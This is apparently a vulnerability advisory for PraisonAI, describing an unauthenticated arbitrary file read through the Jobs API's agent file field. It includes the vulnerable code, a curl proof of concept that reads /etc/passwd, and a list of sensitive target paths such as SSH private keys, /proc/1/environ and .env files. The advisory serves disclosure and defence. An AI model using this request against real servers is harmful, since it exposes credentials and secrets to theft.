PT-2026-53143 · Pypi · Praisonai

Publicado

2026-06-18

·

Atualizado

2026-06-18

CVSS v3.1

7.5

Alta

VetorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

An unauthenticated attacker can read arbitrary files on the server by supplying an absolute filesystem path in the agent file field of the Jobs API. The field has no path validation, no allowlist, and no authentication is required to submit jobs.

Details

The agent file field in JobSubmitRequest accepts any filesystem path with no validation:
python
# src/praisonai/praisonai/jobs/models.py:29
agent file: Optional[str] = Field(None, description="Path to agents.yaml file")
# NO path validator, NO allowlist
The executor reads the file directly:
python
# src/praisonai/praisonai/jobs/executor.py:221
agent file = job.agent file or "agents.yaml"
# passed directly to yaml.safe load(open(agent file))

Proof of Concept

bash
curl -X POST http://:8005/api/v1/runs 
 -H "Content-Type: application/json" 
 -d '{"prompt": "run", "agent file": "/etc/passwd"}'
Server responds with contents of /etc/passwd.
Other exploitable paths:
  • /proc/1/environ — environment variables, API keys
  • /home//.ssh/id rsa — SSH private keys
  • /app/.env — application secrets

Impact

Any unauthenticated attacker with network access to port 8005 can read any file accessible to the server process, including credentials, private keys, and environment variables.

Correção

Path traversal

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

GHSA-P4PJ-VH7H-6CQH

Produtos afetados

Praisonai